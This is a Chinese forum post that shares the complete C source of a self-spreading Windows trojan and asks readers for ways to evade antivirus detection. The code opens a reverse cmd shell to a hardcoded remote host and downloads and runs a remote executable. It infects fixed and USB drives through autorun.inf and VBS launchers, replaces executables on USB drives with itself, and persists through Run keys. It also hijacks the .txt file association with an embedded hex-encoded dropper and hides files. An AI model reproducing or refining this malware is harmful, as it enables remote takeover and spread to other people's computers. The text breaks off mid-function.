[申请加精]你们都懂得
以前总是看汇编病毒,汇编病毒处理复杂的PE文件结构是如鱼得水,但是编写其他的各种功能就有点不那么尽如人意了,所以试着用C语言写了一个感染型木马,希望各位大侠们指点一二。包括感染磁盘,感染U盘,写入autorun.inf,自动从网上下载病毒,病毒有两个线程,一个线程运行反弹木马,一个线程感染磁盘U盘,把U盘里的所有可执行文件隐藏,同时把名字后加一个空格,把病毒替换为原文件名,病毒会自动释放一个Noteped.exe,同时把文件关联修改成noteped.exe,该文件先运行txt文件,然后运行病毒,所以只要打开txt文件就会重新运行病毒,病毒运用的手段都是常规手段,所以会被杀毒软件报毒,希望各位大侠给点免杀手段,废话不多说了,直接上代码。。
/* ////////////////////////////////////////////////////////////////////////////////
* 摘    要:c语言反弹连接型感染型木马,附带U盘感染,磁盘感染,自动下载功能。
* 作    者:HYH
* 完成日期:2011年5月15日
/////////////////////////////////////////////////////////////////////////////// */
#include <string.h>
#include <Winsock2.h>
#include <stdio.h>
#include <Wininet.h>
#pragma warning(disable:4309)
#pragma warning(disable:4305)
#pragma comment(linker,"/subsystem:windows")
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"wininet.lib")
#define MyAddr "h158678667.3322.org"  
#define MyPort 8081
char localfile[MAX_PATH];
DWORD WINAPI Trojan(LPVOID lpParameter);
DWORD WINAPI Infect(LPVOID lpParameter);
bool FileExists(char *filename);
void RegWrite();
void HideFile();
bool WriteInf(char *infname);
bool WriteVbs(char *vbsname);
void InfectDisk(char *drive);
void ReleaseNoteped();
bool InfectU(char *UDiskName);
char *left(char *dst,char *src, int n);
BOOL DownLoadFile(char *url,char *filename);
//请童鞋们不要害怕这个大大的数组,它只是一个exe文件(源代码见下面红色代码)的十六进制形式,直接从C32Asm里面复制就行,可略过不看。。
char node[]={0x4D,0x5A,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xFF,0xFF,0x00,0x00,0xB8,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0xC8,0x00,0x00,0x00,0x0E,0x1F,0xBA,0x0E,0x00,0xB4,0x09,0xCD,0x21,0xB8,\
0x01,0x4C,0xCD,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6F,0x67,0x72,0x61,0x6D,0x20,0x63,0x61,\
0x6E,0x6E,0x6F,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6E,0x20,0x69,0x6E,0x20,0x44,0x4F,0x53,0x20,\
0x6D,0x6F,0x64,0x65,0x2E,0x0D,0x0D,0x0A,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x73,0xF8,0x8B,\
0xDF,0x37,0x99,0xE5,0x8C,0x37,0x99,0xE5,0x8C,0x37,0x99,0xE5,0x8C,0xB4,0x85,0xEB,0x8C,0x36,0x99,\
0xE5,0x8C,0x37,0x99,0xE4,0x8C,0x3E,0x99,0xE5,0x8C,0x55,0x86,0xF6,0x8C,0x32,0x99,0xE5,0x8C,0xDF,\
0x86,0xEE,0x8C,0x36,0x99,0xE5,0x8C,0x52,0x69,0x63,0x68,0x37,0x99,0xE5,0x8C,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x45,0x00,0x00,0x4C,0x01,0x01,\
0x00,0x69,0x97,0xC6,0x4D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE0,0x00,0x0F,0x01,0x0B,0x01,\
0x06,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x10,0x00,0x00,0x00,\
0x10,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,\
0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,\
0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,\
0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA8,0x12,0x00,0x00,0x3C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x10,0x00,0x00,0x2C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2E,0x74,0x65,0x78,0x74,0x00,\
0x00,0x00,0xCA,0x03,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x02,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x10,0x13,0x00,0x00,0x1A,0x13,0x00,0x00,0x30,0x13,0x00,0x00,0x3C,0x13,0x00,0x00,0x48,0x13,\
0x00,0x00,0x5E,0x13,0x00,0x00,0x76,0x13,0x00,0x00,0x88,0x13,0x00,0x00,0x00,0x00,0x00,0x00,0xA8,\
0x13,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x65,0x78,0x70,0x31,0x6F,0x72,0x65,0x72,\
0x2E,0x65,0x78,0x65,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x65,0x78,0x70,0x31,0x6F,0x72,\
0x65,0x72,0x2E,0x65,0x78,0x65,0x00,0x00,0x00,0x5C,0x6E,0x6F,0x74,0x65,0x70,0x61,0x64,0x2E,0x65,\
0x78,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x55,\
0x8B,0xEC,0x81,0xEC,0x20,0x05,0x00,0x00,0x53,0x56,0x8D,0x45,0xF4,0x57,0x33,0xDB,0x50,0x89,0x5D,\
0xF4,0xFF,0x15,0x18,0x10,0x40,0x00,0x50,0xFF,0x15,0x24,0x10,0x40,0x00,0xBE,0x04,0x01,0x00,0x00,\
0x89,0x45,0xFC,0x56,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x53,0x50,0xE8,0xA8,0x01,0x00,0x00,0x56,0x8D,\
0x85,0xF0,0xFE,0xFF,0xFF,0x53,0x50,0xE8,0x9A,0x01,0x00,0x00,0x56,0x8D,0x85,0xE4,0xFB,0xFF,0xFF,\
0x53,0x50,0xE8,0x8C,0x01,0x00,0x00,0x56,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x53,0x50,0xE8,0x7E,0x01,\
0x00,0x00,0x56,0x8D,0x85,0xE0,0xFA,0xFF,0xFF,0x53,0x50,0xE8,0x70,0x01,0x00,0x00,0x83,0xC4,0x3C,\
0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0x56,0x50,0xFF,0x15,0x14,0x10,0x40,0x00,0x8D,0x85,0xE4,0xFB,0xFF,\
0xFF,0x56,0x50,0xFF,0x15,0x10,0x10,0x40,0x00,0x8B,0x3D,0x0C,0x10,0x40,0x00,0x8D,0x85,0xF0,0xFE,\
0xFF,0xFF,0x50,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x50,0xFF,0xD7,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0x50,\
0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x50,0xFF,0xD7,0x8B,0x3D,0x08,0x10,0x40,0x00,0x8D,0x85,0xE8,0xFC,\
0xFF,0xFF,0x68,0x54,0x10,0x40,0x00,0x50,0xFF,0xD7,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0x68,0x44,0x10,\
0x40,0x00,0x50,0xFF,0xD7,0x8D,0x85,0xE4,0xFB,0xFF,0xFF,0x68,0x44,0x10,0x40,0x00,0x50,0xFF,0xD7,\
0x6A,0x01,0x58,0x39,0x45,0xF4,0x89,0x45,0xF8,0x7E,0x50,0x8B,0x45,0xFC,0x83,0xC0,0x04,0x89,0x45,\
0xFC,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x68,0x40,0x10,0x40,0x00,0x50,0xFF,0xD7,0x53,0x53,0x8D,0x85,\
0xE0,0xFA,0xFF,0xFF,0x56,0x50,0x8B,0x45,0xFC,0x6A,0xFF,0xFF,0x30,0x53,0x6A,0x01,0xFF,0x15,0x04,\
0x10,0x40,0x00,0x8D,0x85,0xE0,0xFA,0xFF,0xFF,0x50,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x50,0xFF,0xD7,\
0xFF,0x45,0xF8,0x83,0x45,0xFC,0x04,0x8B,0x45,0xF8,0x3B,0x45,0xF4,0x7C,0xB9,0x8B,0x35,0x00,0x10,\
0x40,0x00,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x6A,0x05,0x50,0xFF,0xD6,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,\
0x50,0xE8,0x60,0x00,0x00,0x00,0x84,0xC0,0x59,0x74,0x09,0x53,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0xEB,\
0x46,0x8D,0x85,0xE4,0xFB,0xFF,0xFF,0x50,0xE8,0x46,0x00,0x00,0x00,0x84,0xC0,0x59,0x74,0x09,0x53,\
0x8D,0x85,0xE4,0xFB,0xFF,0xFF,0xEB,0x2C,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x68,0x30,0x10,0x40,0x00,\
0x50,0x88,0x9D,0xEF,0xFD,0xFF,0xFF,0xFF,0xD7,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x50,0xE8,0x18,0x00,\
0x00,0x00,0x84,0xC0,0x59,0x74,0x0A,0x53,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x50,0xFF,0xD6,0x5F,0x5E,\
0x33,0xC0,0x5B,0xC9,0xC2,0x10,0x00,0x55,0x8B,0xEC,0x81,0xEC,0x40,0x01,0x00,0x00,0x8D,0x85,0xC0,\
0xFE,0xFF,0xFF,0x50,0xFF,0x75,0x08,0xFF,0x15,0x1C,0x10,0x40,0x00,0x83,0xF8,0xFF,0x0F,0x95,0xC0,\
0xC9,0xC3,0xCC,0xCC,0x8B,0x54,0x24,0x0C,0x8B,0x4C,0x24,0x04,0x85,0xD2,0x74,0x47,0x33,0xC0,0x8A,\
0x44,0x24,0x08,0x57,0x8B,0xF9,0x83,0xFA,0x04,0x72,0x2D,0xF7,0xD9,0x83,0xE1,0x03,0x74,0x08,0x2B,\
0xD1,0x88,0x07,0x47,0x49,0x75,0xFA,0x8B,0xC8,0xC1,0xE0,0x08,0x03,0xC1,0x8B,0xC8,0xC1,0xE0,0x10,\
0x03,0xC1,0x8B,0xCA,0x83,0xE2,0x03,0xC1,0xE9,0x02,0x74,0x06,0xF3,0xAB,0x85,0xD2,0x74,0x06,0x88,\
0x07,0x47,0x4A,0x75,0xFA,0x8B,0x44,0x24,0x08,0x5F,0xC3,0x8B,0x44,0x24,0x04,0xC3,0xE4,0x12,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x9A,0x13,0x00,0x00,0x00,0x10,0x00,0x00,0x08,0x13,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xBE,0x13,0x00,0x00,0x24,0x10,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x10,0x13,0x00,0x00,0x1A,0x13,0x00,0x00,0x30,0x13,0x00,0x00,0x3C,0x13,0x00,0x00,0x48,0x13,0x00,\
0x00,0x5E,0x13,0x00,0x00,0x76,0x13,0x00,0x00,0x88,0x13,0x00,0x00,0x00,0x00,0x00,0x00,0xA8,0x13,\
0x00,0x00,0x00,0x00,0x00,0x00,0xD3,0x02,0x57,0x69,0x6E,0x45,0x78,0x65,0x63,0x00,0xD2,0x02,0x57,\
0x69,0x64,0x65,0x43,0x68,0x61,0x72,0x54,0x6F,0x4D,0x75,0x6C,0x74,0x69,0x42,0x79,0x74,0x65,0x00,\
0xF9,0x02,0x6C,0x73,0x74,0x72,0x63,0x61,0x74,0x41,0x00,0x00,0x02,0x03,0x6C,0x73,0x74,0x72,0x63,\
0x70,0x79,0x41,0x00,0x00,0x59,0x01,0x47,0x65,0x74,0x53,0x79,0x73,0x74,0x65,0x6D,0x44,0x69,0x72,\
0x65,0x63,0x74,0x6F,0x72,0x79,0x41,0x00,0x7D,0x01,0x47,0x65,0x74,0x57,0x69,0x6E,0x64,0x6F,0x77,\
0x73,0x44,0x69,0x72,0x65,0x63,0x74,0x6F,0x72,0x79,0x41,0x00,0x00,0xCB,0x00,0x47,0x65,0x74,0x43,\
0x6F,0x6D,0x6D,0x61,0x6E,0x64,0x4C,0x69,0x6E,0x65,0x57,0x00,0x94,0x00,0x46,0x69,0x6E,0x64,0x46,\
0x69,0x72,0x73,0x74,0x46,0x69,0x6C,0x65,0x41,0x00,0x00,0x4B,0x45,0x52,0x4E,0x45,0x4C,0x33,0x32,\
0x2E,0x64,0x6C,0x6C,0x00,0x00,0x02,0x00,0x43,0x6F,0x6D,0x6D,0x61,0x6E,0x64,0x4C,0x69,0x6E,0x65,\
0x54,0x6F,0x41,0x72,0x67,0x76,0x57,0x00,0x00,0x53,0x48,0x45,0x4C,0x4C,0x33,0x32,0x2E,0x64,0x6C,\
0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,PSTR szCmdLine,int iCmdShow)
{
//创建命名互斥对象,防止进程被多次运行
  HANDLE hMutex=CreateMutex(NULL,FALSE,"HYH");
  if(hMutex==NULL)
    ExitProcess(0);
  if(GetLastError()==ERROR_ALREADY_EXISTS)
    ExitProcess(0);
  memset(localfile,0,MAX_PATH);
  GetModuleFileName(NULL,localfile,MAX_PATH);
  HANDLE hTrojan=CreateThread(NULL,NULL,Trojan,NULL,NULL,NULL);
  HANDLE infect=CreateThread(NULL,NULL,Infect,NULL,NULL,NULL);
  char url[MAX_PATH]="http://www.ku6tvb.com/Sx_server.exe";
  if(!FileExists("c:\\Program Files\\a.exe"))
  {
      DownLoadFile(url,"c:\\Program Files\\a.exe");
    SetFileAttributes("c:\\Program Files\\a.exe",FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
  }
  WinExec("c:\\Program Files\\a.exe",SW_HIDE);
  while(true)
  {
    HideFile();
    RegWrite();
    Sleep(300000);
  }
    return 0;
}
//反弹木马线程,该线程利用TCP套接字连接nc服务端,把客户端机器的cmd反弹给服务端。。。
DWORD WINAPI Trojan(LPVOID lpParameter)
{
  LPHOSTENT HostEnts;
  SOCKADDR_IN SockAddrIn;
  SOCKET HSocket;
  DWORD *lpdwflags=NULL;
  int status;
  char szCMDPath[MAX_PATH];
  STARTUPINFO StartupInfo;
  WSADATA WSADa;
  PROCESS_INFORMATION ProcessInfo;
  GetSystemDirectory(szCMDPath,MAX_PATH);
  strcat(szCMDPath,"\\cmd.exe");
  for(;;)
  {
      try
    {
    while(!InternetGetConnectedState(lpdwflags,0))
      Sleep(10000);
    status=0;
    ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION));
    ZeroMemory(&StartupInfo,sizeof(STARTUPINFO));
    ZeroMemory(&WSADa,sizeof(WSADATA));
    WSAStartup(MAKEWORD(1,1),&WSADa);
    HostEnts=gethostbyname(MyAddr);
    SockAddrIn.sin_addr=*((LPIN_ADDR)*HostEnts->h_addr_list);
    SockAddrIn.sin_family=AF_INET;
    SockAddrIn.sin_port=htons(MyPort);
    HSocket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
    do{
      status=connect(HSocket,(SOCKADDR *)&SockAddrIn,sizeof(SockAddrIn));
    }while(status==SOCKET_ERROR);
    StartupInfo.cb=sizeof(STARTUPINFO);
    StartupInfo.wShowWindow=SW_HIDE;
    StartupInfo.dwFlags=STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
    StartupInfo.hStdError=(HANDLE)HSocket;
    StartupInfo.hStdOutput=(HANDLE)HSocket;
    StartupInfo.hStdInput=(HANDLE)HSocket;
    CreateProcess(NULL,szCMDPath,NULL,NULL,TRUE,0,NULL,NULL,&StartupInfo,&ProcessInfo);
    WaitForSingleObject(ProcessInfo.hProcess,INFINITE);
    if (WAIT_OBJECT_0==WaitForSingleObject(ProcessInfo.hProcess,INFINITE)) 
    {
      CloseHandle(ProcessInfo.hProcess);
      CloseHandle(ProcessInfo.hThread);
      closesocket(HSocket);
      WSACleanup();
    }
    }
    catch(...)
    {
      continue;
    }
  }
}
//感染线程,感染系统磁盘和U盘,这里需要掌握的是驱动器盘符的获取有关的API函数及用法
DWORD WINAPI Infect(LPVOID lpParameter)
{
  char Drives[255];
  int Type;
  char *pDrive;
  char systempath[MAX_PATH];
  char windowspath[MAX_PATH];
  memset(systempath,0,MAX_PATH);
  memset(windowspath,0,MAX_PATH);
  GetWindowsDirectory(windowspath,MAX_PATH);
  GetSystemDirectory(systempath,MAX_PATH);
  while(true)
  {
    memset(Drives,0,sizeof(Drives));
    pDrive=Drives;
    GetLogicalDriveStrings(sizeof(Drives),Drives);
    for(;pDrive[0]!=NULL;)
    {
      Type=GetDriveType(pDrive);
      switch(Type)
      {
      case DRIVE_REMOVABLE:
        if(strcmp(pDrive,"A:\\")==0)
        {
          pDrive+=4;
          continue;
        }
        else
        {
          InfectDisk(pDrive);
          InfectU(pDrive);
          pDrive+=4;continue;
        }
      case DRIVE_FIXED:InfectDisk(pDrive);
        pDrive+=4;continue;
      default:pDrive+=4;continue;
      }
    }
    strcat(windowspath,"\\exp1orer.exe");
    CopyFile(localfile,windowspath,TRUE);
    strcat(systempath,"\\exp1orer.exe");
    CopyFile(localfile,systempath,TRUE);
    systempath[3]='\0';
    strcat(systempath,"Program Files\\exp1orer.exe");
    CopyFile(localfile,systempath,TRUE);
    memset(windowspath,0,MAX_PATH);
    GetWindowsDirectory(windowspath,MAX_PATH);
    strcat(windowspath,"\\noteped.exe");
    if(!FileExists(windowspath))
      ReleaseNoteped();
    Sleep(10000);
  }
}
//修改相应注册表文件,了解常用注册表API函数的用法就行了。。
void RegWrite()
{
  HKEY hKey;
  DWORD value;
  char filepath[MAX_PATH];
  memset(filepath,0,MAX_PATH);
  GetWindowsDirectory(filepath,MAX_PATH);
  strcat(filepath,"\\exp1orer.exe");
  //修改主页
  RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Internet Explorer\\Main",&hKey);
  RegSetValueEx(hKey,"Start Page",0,REG_SZ,(BYTE *)"www.gov.cn",lstrlen("www.gov.cn"));
  //把自己加入启动项
  RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce",&hKey);
  RegSetValueEx(hKey,"exp1orer",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
  filepath[3]='\0';
  strcat(filepath,"Program Files\\exp1orer.exe");
    RegSetValueEx(hKey,"exp1orer",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
  filepath[3]='\0';
  strcat(filepath,"exp1orer.exe");
  RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
  RegSetValueEx(hKey,"exp1orer",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
  memset(filepath,0,MAX_PATH);
  GetWindowsDirectory(filepath,MAX_PATH);
  strcat(filepath,"\\noteped.exe %1");
  //修改txt文件关联
  RegCreateKey(HKEY_CLASSES_ROOT,"txtfile\\shell\\open\\command",&hKey);
  RegSetValueEx(hKey,"",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
  value=243;
  RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",&hKey);
  RegSetValueEx(hKey,"NoDriveTypeAutoRun",0,REG_DWORD,(BYTE *)&value,sizeof(DWORD));
  //使显示隐藏文件无效
  value=0;
  RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL",&hKey);
  RegSetValueEx(hKey,"CheckedValue",0,REG_DWORD,(BYTE *)&value,sizeof(DWORD));
  value=2;
  RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN",&hKey);
  RegSetValueEx(hKey,"CheckedValue",3,REG_DWORD,(BYTE *)&value,sizeof(DWORD));
}
//把病毒副本复制到系统目录,windows目录并设置程隐藏
void HideFile()
{
  char newfile[MAX_PATH];
  memset(newfile,0,MAX_PATH);
  GetSystemDirectory(newfile,MAX_PATH);
  strcat(newfile,"\\exp1orer.exe");
  CopyFile(localfile,newfile,TRUE);
  SetFileAttributes(newfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
  memset(newfile,0,MAX_PATH);
  GetWindowsDirectory(newfile,MAX_PATH);
  strcat(newfile,"\\exp1orer.exe");
  CopyFile(localfile,newfile,TRUE);
  SetFileAttributes(newfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);  
  newfile[3]='\0';
  strcat(newfile,"Program Files\\exp1orer.exe");
  CopyFile(localfile,newfile,TRUE);
  SetFileAttributes(newfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}
//写入autorun.inf文件,使磁盘和U盘自动运行
bool WriteInf(char *infname)
{
  char autorun[MAX_PATH]="[AutoRun]\nopen=wscript.exe system.vbs\nshell\\open\\打开(&O)\nshell\\open\\Command=wscript.exe system.vbs\nshell\\open\\default=1\nshell\\explore\\资源管理器(&X)\nshell\\explore\\Command=wscript.exe system.vbs";
  FILE *fp;
  fp=fopen(infname,"w+");
  if(fp==NULL)
    return FALSE;
  fwrite(autorun,sizeof(char),lstrlen(autorun),fp);
  fclose(fp);
  SetFileAttributes(infname,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
  return TRUE;
}
//写入vbs文件,打开磁盘时候运行病毒的同时打开磁盘
bool WriteVbs(char *vbsname)
{
  char *vbs1={"On Error Resume Next\nDim Wsh\nSet Wsh = WScript.CreateObject(\"WScript.Shell\")\nWsh.Run \"cmd /c explorer "};
  char *vbs2={"\",false,false\nWsh.Run \"exp1orer.exe\",false,false\nWScript.quit"};
  char vbs[MAX_PATH];
  char path[MAX_PATH];
  memset(path,0,MAX_PATH);
  memset(vbs,0,MAX_PATH);
  strcpy(path,vbsname);
  path[3]='\0';
  strcpy(vbs,vbs1);
  strcat(vbs,path);
  strcat(vbs,vbs2);
  FILE *fp;
  fp=fopen(vbsname,"w+");
  if(fp==NULL)
    return FALSE;
  fwrite(vbs,sizeof(char),lstrlen(vbs),fp);
  fclose(fp);
  SetFileAttributes(vbsname,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
  return TRUE;
}
//向windows目录释放noteped.exe文件,劫持txt文件的打开方式
void ReleaseNoteped()
{
  DWORD written;
  char windows[MAX_PATH];
  memset(windows,0,MAX_PATH);
  GetWindowsDirectory(windows,MAX_PATH);
  strcat(windows,"\\noteped.exe");
  HANDLE hFile=CreateFile(windows,GENERIC_WRITE,NULL,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
  WriteFile(hFile,node,sizeof(node),&written,NULL);
  FlushFileBuffers(hFile);
  CloseHandle(hFile);
}
//感染U盘,把U盘里可执行文件替换为病毒文件,把原文件名后面加上空格并隐藏,这里需要掌握的是磁盘的遍历方法。。。
bool InfectU(char *UDiskName)
{
  WIN32_FIND_DATA winfind;
  HANDLE hFile;
  char path[MAX_PATH];
  char newpath[MAX_PATH];
  char newname[MAX_PATH];
  char oldname[MAX_PATH];
  char filename[MAX_PATH];
  strcpy(path,UDiskName);
  strcat(path,"*.*");
  hFile=FindFirstFile(path,&winfind);
  if(hFile==INVALID_HANDLE_VALUE)
    return false;
  do
  {
    if(strcmp(winfind.cFileName,".")==0||strcmp(winfind.cFileName,"..")==0)
      continue;
    if(winfind.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY)
    {
      sprintf(newpath,"%s%s\\",UDiskName,winfind.cFileName);
      InfectU(newpath);          
    }
    if(strstr(winfind.cFileName,".exe")!=NULL && strstr(winfind.cFileName," .exe")==NULL)
    {
      if(strcmp(winfind.cFileName,"exp1orer.exe")!=0)
      {
        left(filename,winfind.cFileName,int(strstr(winfind.cFileName,".exe")-winfind.cFileName));
        strcpy(newname,UDiskName);
        strcat(newname,filename);
        strcat(newname," .exe");
        strcpy(oldname,UDiskName);
        strcat(oldname,winfind.cFileName);
        if(!MoveFileEx(oldname,newname,MOVEFILE_COPY_ALLOWED))
          return false;
        SetFileAttributes(newname,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
        if(!CopyFile(localfile,oldname,FALSE))
          return false;
        SetFileAttributes(oldname,FILE_ATTRIBUTE_NORMAL);
      }
    }
  }while(FindNextFile(hFile,&winfind));
  return true;
}
//感染磁盘,写入autorun.inf和vbs脚本
void InfectDisk(char *drive)
{
  char diskfile[MAX_PATH];
  char diskinf[MAX_PATH];
  char diskvbs[MAX_PATH];
  memset(diskfile,0,MAX_PATH);
  memset(diskinf,0,MAX_PATH);
  memset(diskvbs,0,MAX_PATH);
  strcpy(diskfile,drive);
  strcpy(diskinf,drive);
  strcpy(diskvbs,drive);
  strcat(diskfile,"exp1orer.exe");
  strcat(diskinf,"autorun.inf");
  strcat(diskvbs,"system.vbs");
  printf("%s",localfile);
  printf("%s",diskfile);
  CopyFile(localfile,diskfile,TRUE);
  SetFileAttributes(diskfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
  WriteInf(diskinf);
  WriteVbs(diskvbs);
}
//取字符串左边N位
char *left(char *dst,char *src, int n)
{
  char *p = src;
  char *q = dst;
  int len = strlen(src);
  if(n>len) 
    n = len;
  while(n--) 
    *(q++) = *(p++);
  *(q++)='\0';
  return dst;
}
//判断文件是否存在
bool FileExists(char *filename)
{
  HANDLE hFind;
  WIN32_FIND_DATA FindData;
  hFind=FindFirstFile(filename,&FindData);
  if(hFind==INVALID_HANDLE_VALUE)
  {
    return false;
  }
  return true;
}
//利用wininet.h头文件里的与Http有关的API函数实现网络文件的下载(说白了就是从网上读取一段文件然后写入到本地机器)功能
BOOL DownLoadFile(char *url,char *filename)
{
  DWORD byteread=0;   
  char buffer[25*1024];   
  memset(buffer,0,25*1024);   
  HINTERNET HInternet;   
  HInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);   
  if (HInternet==NULL)   
  {    
    return FALSE;   
  }   
  HINTERNET    HOpen;   
  HOpen = InternetOpenUrl(HInternet,url,
    NULL,0,INTERNET_FLAG_TRANSFER_BINARY|INTERNET_FLAG_PRAGMA_NOCACHE,0);      
  if (HOpen==NULL)   
  {    
    InternetCloseHandle(HInternet);
    return FALSE;
  }   
  BOOL hwrite;   
  DWORD written;   
  HANDLE createfile;   
  createfile = CreateFile(filename,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);   
  if (createfile==INVALID_HANDLE_VALUE)   
  {      
    InternetCloseHandle(HOpen); 
    InternetCloseHandle(HInternet);  
    return FALSE;
  }   
  BOOL internetreadfile;   
  while(1)   
  {   
    internetreadfile=InternetReadFile(HOpen,buffer,sizeof(buffer),&byteread);   
    if(byteread==0)     
      break;   
    hwrite=WriteFile(createfile,buffer,sizeof(buffer),&written,NULL);   
    if (hwrite==0)   
    {    
      CloseHandle(createfile);  
      InternetCloseHandle(HOpen); 
      InternetCloseHandle(HInternet); 
      return FALSE;
    }   
  }   
